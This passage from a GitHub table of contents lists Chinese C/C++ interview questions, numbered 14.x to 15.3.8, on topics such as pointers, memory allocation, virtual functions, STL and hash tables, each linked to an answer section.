函数参数压栈方式为什么是从右到左的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#412%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E5%8E%8B%E6%A0%88%E6%96%B9%E5%BC%8F%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E4%BB%8E%E5%8F%B3%E5%88%B0%E5%B7%A6%E7%9A%84) ##### [14.3.2 C++中的智能指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#413c%E4%B8%AD%E7%9A%84%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88) ##### [14.3.3 基类里private成员函数可以声明为虚函数吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#414%E5%9F%BA%E7%B1%BB%E9%87%8Cprivate%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97) ##### [14.3.4 函数A调用函数B的时候,有什么需要压栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#415%E5%87%BD%E6%95%B0a%E8%B0%83%E7%94%A8%E5%87%BD%E6%95%B0b%E7%9A%84%E6%97%B6%E5%80%99%E6%9C%89%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E5%8E%8B%E6%A0%88) ##### [14.3.5 数组和指针区别?数组和链表呢?双向链表和单向链表?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#416%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E5%8C%BA%E5%88%AB%E6%95%B0%E7%BB%84%E5%92%8C%E9%93%BE%E8%A1%A8%E5%91%A2%E5%8F%8C%E5%90%91%E9%93%BE%E8%A1%A8%E5%92%8C%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8) ##### [14.3.6 vector底层实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#417vector%E5%BA%95%E5%B1%82%E5%AE%9E%E7%8E%B0) ##### [14.3.7 vector与list的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#418vector%E4%B8%8Elist%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.3.8 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#419%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.3.9 简述#ifdef、#else、#endif和#ifndef的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#420%E7%AE%80%E8%BF%B0ifdefelseendif%E5%92%8Cifndef%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [14.4.1 写出int、bool、float、指针变量与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#421%E5%86%99%E5%87%BAintboolfloat%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.4.2 结构体可以直接赋值吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#422%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E8%B5%8B%E5%80%BC%E5%90%97) ##### [14.4.3 sizeof和strlen的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#423sizeof%E5%92%8Cstrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.4.4 
c语言的关键字static和c++关键字static有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#424c%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97static%E5%92%8Cc%E5%85%B3%E9%94%AE%E5%AD%97static%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.4.5 c语言的malloc和c++中的new有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#425c%E8%AF%AD%E8%A8%80%E7%9A%84malloc%E5%92%8Cc%E4%B8%AD%E7%9A%84new%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.4.6 写一个”标准“宏MIN](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#426%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin) ##### [14.4.7 ++i和i++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#427i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.4.8 volatile有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#428volatile%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [14.4.9 一个参数可以既是const又是volatile吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#429%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%97%A2%E6%98%AFconst%E5%8F%88%E6%98%AFvolatile%E5%90%97) ##### [14.5.1 a和&a有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#430a%E5%92%8Ca%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.5.2 用c编写一个死循环程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#431%E7%94%A8c%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [14.5.3 结构体内存对齐的问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#432%E7%BB%93%E6%9E%84%E4%BD%93%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E7%9A%84%E9%97%AE%E9%A2%98) ##### [14.5.4 全局变量和局部变量有什么区别?是怎么是实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#433%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E6%98%AF%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [14.5.5 简述c、c++程序编译的内存分配情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#434%E7%AE%80%E8%BF%B0cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [14.5.6 简述strcpy、sprintf、memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#435%E7%AE%80%E8%BF%B0strcpysprintfmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.5.7 解析((void()())0)()的含义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#436%E8%A7%A3%E6%9E%90void0%E7%9A%84%E5%90%AB%E4%B9%89) ##### [14.5.8 c语言的指针和引用和c++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#437c%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.5.9 new与malloc的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#438new%E4%B8%8Emalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.6.1 malloc/free 为什么还要 new/delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#439mallocfree-%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E8%A6%81-newdelete) ##### [14.6.2 delete与 delete 
[]区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#440delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [14.6.3 在物理内存为1G的计算机中能否malloc(1.2G)?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#441%E5%9C%A8%E7%89%A9%E7%90%86%E5%86%85%E5%AD%98%E4%B8%BA1g%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%AD%E8%83%BD%E5%90%A6malloc12g) ##### [14.6.4 用C写个程序,如何判断一个操作系统是16位还是32位的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#442%E7%94%A8c%E5%86%99%E4%B8%AA%E7%A8%8B%E5%BA%8F%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%98%AF16%E4%BD%8D%E8%BF%98%E6%98%AF32%E4%BD%8D%E7%9A%84) ##### [14.6.5 解释下位域,为什么要用位域,位域的好处?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#443%E8%A7%A3%E9%87%8A%E4%B8%8B%E4%BD%8D%E5%9F%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E7%94%A8%E4%BD%8D%E5%9F%9F%E4%BD%8D%E5%9F%9F%E7%9A%84%E5%A5%BD%E5%A4%84) ##### [14.6.6 位操作](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#444%E4%BD%8D%E6%93%8D%E4%BD%9C) ##### [14.6.7 在某工程中,要求设置一绝对地址为0x67a9的整型变量的值为0xaa66。编译器是一个纯粹的ANSI编译器。写代码去完成这一任务。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#445%E5%9C%A8%E6%9F%90%E5%B7%A5%E7%A8%8B%E4%B8%AD%E8%A6%81%E6%B1%82%E8%AE%BE%E7%BD%AE%E4%B8%80%E7%BB%9D%E5%AF%B9%E5%9C%B0%E5%9D%80%E4%B8%BA0x67a9%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA0xaa66%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E4%B8%80%E4%B8%AA%E7%BA%AF%E7%B2%B9%E7%9A%84ansi%E7%BC%96%E8%AF%91%E5%99%A8%E5%86%99%E4%BB%A3%E7%A0%81%E5%8E%BB%E5%AE%8C%E6%88%90%E8%BF%99%E4%B8%80%E4%BB%BB%E5%8A%A1) ##### [14.6.8 给定一个整型变量a,写两段代码,第一个设置a的bit3,第二个清除a的bit,在以上两个操作中,要保持其它位不变。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#446%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8Fa%E5%86%99%E4%B8%A4%E6%AE%B5%E4%BB%A3%E7%A0%81%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%AE%BE%E7%BD%AEa%E7%9A%84bit3%E7%AC%AC%E4%BA%8C%E4%B8%AA%E6%B8%85%E9%99%A4a%E7%9A%84bit%E5%9C%A8%E4%BB%A5%E4%B8%8A%E4%B8%A4%E4%B8%AA%E6%93%8D%E4%BD%9C%E4%B8%AD%E8%A6%81%E4%BF%9D%E6%8C%81%E5%85%B6%E5%AE%83%E4%BD%8D%E4%B8%8D%E5%8F%98) ##### [14.6.9 什么是右值引用,跟左值又有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#446%E7%BB%99%E5%AE%9A%E4%B8%80%E4%B8%AA%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8Fa%E5%86%99%E4%B8%A4%E6%AE%B5%E4%BB%A3%E7%A0%81%E7%AC%AC%E4%B8%80%E4%B8%AA%E8%AE%BE%E7%BD%AEa%E7%9A%84bit3%E7%AC%AC%E4%BA%8C%E4%B8%AA%E6%B8%85%E9%99%A4a%E7%9A%84bit%E5%9C%A8%E4%BB%A5%E4%B8%8A%E4%B8%A4%E4%B8%AA%E6%93%8D%E4%BD%9C%E4%B8%AD%E8%A6%81%E4%BF%9D%E6%8C%81%E5%85%B6%E5%AE%83%E4%BD%8D%E4%B8%8D%E5%8F%98) ##### [14.7.1 判断x=x+1,x+=1,x++哪个效率最高?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#448%E5%88%A4%E6%96%ADxx1x1x%E5%93%AA%E4%B8%AA%E6%95%88%E7%8E%87%E6%9C%80%E9%AB%98%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [14.7.2 用变量a定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#449%E7%94%A8%E5%8F%98%E9%87%8Fa%E5%AE%9A%E4%B9%89) ##### [14.7.3 C语言是强类型的语言,这是什么意思?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#450c%E8%AF%AD%E8%A8%80%E6%98%AF%E5%BC%BA%E7%B1%BB%E5%9E%8B%E7%9A%84%E8%AF%AD%E8%A8%80%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D) ##### [14.7.4 char 与 
int之间的转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#450c%E8%AF%AD%E8%A8%80%E6%98%AF%E5%BC%BA%E7%B1%BB%E5%9E%8B%E7%9A%84%E8%AF%AD%E8%A8%80%E8%BF%99%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D) ##### [14.7.5 float(单精度浮点型)和double(双精度浮点型)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#452float%E5%8D%95%E7%B2%BE%E5%BA%A6%E6%B5%AE%E7%82%B9%E5%9E%8B%E5%92%8Cdouble%E5%8F%8C%E7%B2%BE%E5%BA%A6%E6%B5%AE%E7%82%B9%E5%9E%8B) ##### [14.7.6 字符常量](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#453%E5%AD%97%E7%AC%A6%E5%B8%B8%E9%87%8F) ##### [14.7.7 写出bool 、int、 指针变量与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#454%E5%86%99%E5%87%BAbool-int-%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.7.8 写出float x 与“零值”比较的if语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#455%E5%86%99%E5%87%BAfloat-x-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [14.7.9 区分 %d, %ld, %lld, %lf, %f](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#456%E5%8C%BA%E5%88%86-d-ld-lld-lf-f) ##### [14.8.1 输出数据问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#457%E8%BE%93%E5%87%BA%E6%95%B0%E6%8D%AE%E9%97%AE%E9%A2%98) ##### [14.8.2 嵌入式系统中经常要用到无限循环,你怎么样用C编写死循环](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#458%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%BB%8F%E5%B8%B8%E8%A6%81%E7%94%A8%E5%88%B0%E6%97%A0%E9%99%90%E5%BE%AA%E7%8E%AF%E4%BD%A0%E6%80%8E%E4%B9%88%E6%A0%B7%E7%94%A8c%E7%BC%96%E5%86%99%E6%AD%BB%E5%BE%AA%E7%8E%AF) ##### [14.8.3 惰性计算方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#459%E6%83%B0%E6%80%A7%E8%AE%A1%E7%AE%97%E6%96%B9%E6%B3%95) ##### [14.8.4 变量的声明和定义有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#460%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.8.5 用预处理指令#define 声明一个常数,用以表明1年中有多少秒(忽略闰年问题)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#461%E7%94%A8%E9%A2%84%E5%A4%84%E7%90%86%E6%8C%87%E4%BB%A4define-%E5%A3%B0%E6%98%8E%E4%B8%80%E4%B8%AA%E5%B8%B8%E6%95%B0%E7%94%A8%E4%BB%A5%E8%A1%A8%E6%98%8E1%E5%B9%B4%E4%B8%AD%E6%9C%89%E5%A4%9A%E5%B0%91%E7%A7%92%E5%BF%BD%E7%95%A5%E9%97%B0%E5%B9%B4%E9%97%AE%E9%A2%98) ##### [14.8.6 写一个“标准”宏MIN,这个宏输入两个参数并返回较小的一个](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#462%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin%E8%BF%99%E4%B8%AA%E5%AE%8F%E8%BE%93%E5%85%A5%E4%B8%A4%E4%B8%AA%E5%8F%82%E6%95%B0%E5%B9%B6%E8%BF%94%E5%9B%9E%E8%BE%83%E5%B0%8F%E7%9A%84%E4%B8%80%E4%B8%AA) ##### [14.8.7 sizeof和strlen的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#464c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84static%E5%92%8Cc%E4%B8%ADstatic%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.8.8 c语言中的static和C++中static的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#464c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84static%E5%92%8Cc%E4%B8%ADstatic%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.8.9 
C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#465c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [14.9.1 C++里面是不是所有的动作都是main()引起的?如果不是,请举例。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#466c%E9%87%8C%E9%9D%A2%E6%98%AF%E4%B8%8D%E6%98%AF%E6%89%80%E6%9C%89%E7%9A%84%E5%8A%A8%E4%BD%9C%E9%83%BD%E6%98%AFmain%E5%BC%95%E8%B5%B7%E7%9A%84%E5%A6%82%E6%9E%9C%E4%B8%8D%E6%98%AF%E8%AF%B7%E4%B8%BE%E4%BE%8B) ##### [14.9.2 谈谈对面向对象的认识](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#467%E8%B0%88%E8%B0%88%E5%AF%B9%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%AE%A4%E8%AF%86) ##### [14.9.3 谈谈你对编程规范的理解](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#468%E8%B0%88%E8%B0%88%E4%BD%A0%E5%AF%B9%E7%BC%96%E7%A8%8B%E8%A7%84%E8%8C%83%E7%9A%84%E7%90%86%E8%A7%A3) ##### [14.9.4 面向对象的三大特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#469%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E4%B8%89%E5%A4%A7%E7%89%B9%E6%80%A7) ##### [14.9.5 简述多态的原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#470%E7%AE%80%E8%BF%B0%E5%A4%9A%E6%80%81%E7%9A%84%E5%8E%9F%E7%90%86) ##### [14.9.6 多态的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#471%E5%A4%9A%E6%80%81%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [14.9.7 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#472%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [14.9.8 重载(overload)、重写(override,有的书也叫做“覆盖”)、重定义(redefinition)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#473%E9%87%8D%E8%BD%BDoverload%E9%87%8D%E5%86%99override%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E9%87%8D%E5%AE%9A%E4%B9%89redefinition%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.9.9 所有的运算符都能重载吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#474%E6%89%80%E6%9C%89%E7%9A%84%E8%BF%90%E7%AE%97%E7%AC%A6%E9%83%BD%E8%83%BD%E9%87%8D%E8%BD%BD%E5%90%97) ##### [15.1.1 用C++设计一个不能继承的类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#475%E7%94%A8c%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E4%B8%8D%E8%83%BD%E7%BB%A7%E6%89%BF%E7%9A%84%E7%B1%BB) ##### [15.1.2 构造函数能否为虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#476%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E5%90%A6%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [15.1.3 在C中用const 能定义真正意义上的常量吗?C++中的const呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#477%E5%9C%A8c%E4%B8%AD%E7%94%A8const-%E8%83%BD%E5%AE%9A%E4%B9%89%E7%9C%9F%E6%AD%A3%E6%84%8F%E4%B9%89%E4%B8%8A%E7%9A%84%E5%B8%B8%E9%87%8F%E5%90%97c%E4%B8%AD%E7%9A%84const%E5%91%A2) ##### [15.1.4 宏和内联(inline)函数的比较?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#478%E5%AE%8F%E5%92%8C%E5%86%85%E8%81%94inline%E5%87%BD%E6%95%B0%E7%9A%84%E6%AF%94%E8%BE%83) ##### [15.1.5 typedef和define由什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#479typedef%E5%92%8Cdefine%E7%94%B1%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [15.1.6 
strcat、strncat、strcpy哪些函数会导致内存溢出?如何改进?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#480strcatstrncatstrcpy%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%BC%9A%E5%AF%BC%E8%87%B4%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA%E5%A6%82%E4%BD%95%E6%94%B9%E8%BF%9B) ##### [15.1.7 简述队列和栈的异同](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#481%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [15.1.8 堆和栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#482%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.1.9 堆和自由存储区的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#483%E5%A0%86%E5%92%8C%E8%87%AA%E7%94%B1%E5%AD%98%E5%82%A8%E5%8C%BA%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.2.1 什么是内存泄漏?面对内存泄漏有什么避免方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#484%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E6%9C%89%E4%BB%80%E4%B9%88%E9%81%BF%E5%85%8D%E6%96%B9%E6%B3%95) ##### [15.2.2 链表和数组的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#485%E9%93%BE%E8%A1%A8%E5%92%8C%E6%95%B0%E7%BB%84%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.2.3 结构与联合有和区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#486%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [15.2.4 什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#487%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [15.2.5 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#488%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [15.2.6 STL标准模板库](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#489stl%E6%A0%87%E5%87%86%E6%A8%A1%E6%9D%BF%E5%BA%93) ##### [15.2.7 陷阱题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#490%E9%99%B7%E9%98%B1%E9%A2%98) ##### [15.2.8 一个C++源文件从文本到可执行文件经历的过程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#491%E4%B8%80%E4%B8%AAc%E6%BA%90%E6%96%87%E4%BB%B6%E4%BB%8E%E6%96%87%E6%9C%AC%E5%88%B0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E7%BB%8F%E5%8E%86%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.2.9 #include 的顺序以及尖叫括号和双引号的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#492include-%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%A5%E5%8F%8A%E5%B0%96%E5%8F%AB%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.3.1 进程和线程,为什么要有线程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#493%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E7%BA%BF%E7%A8%8B) ##### [15.3.2 C++11有哪些新特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#494c11%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B0%E7%89%B9%E6%80%A7) ##### [15.3.3 
malloc的原理,brk系统调用干什么的,mmap呢](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#495malloc%E7%9A%84%E5%8E%9F%E7%90%86brk%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E5%B9%B2%E4%BB%80%E4%B9%88%E7%9A%84mmap%E5%91%A2) ##### [15.3.4 C++的内存管理方式,STL的allocator,最新版本默认使用的分配器](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#496c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%96%B9%E5%BC%8Fstl%E7%9A%84allocator%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC%E9%BB%98%E8%AE%A4%E4%BD%BF%E7%94%A8%E7%9A%84%E5%88%86%E9%85%8D%E5%99%A8) ##### [15.3.5 hash表的实现,包括STL中的哈希桶长度常数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#497hash%E8%A1%A8%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8C%85%E6%8B%ACstl%E4%B8%AD%E7%9A%84%E5%93%88%E5%B8%8C%E6%A1%B6%E9%95%BF%E5%BA%A6%E5%B8%B8%E6%95%B0) ##### [15.3.6 hash表如何rehash,怎么处理其中保存的资源](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#498hash%E8%A1%A8%E5%A6%82%E4%BD%95rehash%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86%E5%85%B6%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E8%B5%84%E6%BA%90) ##### [15.3.7 Redis的rehash怎么做的,为什么要渐进rehash,渐进rehash怎么实现的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#499redis%E7%9A%84rehash%E6%80%8E%E4%B9%88%E5%81%9A%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%B8%90%E8%BF%9Brehash%E6%B8%90%E8%BF%9Brehash%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [15.3.8 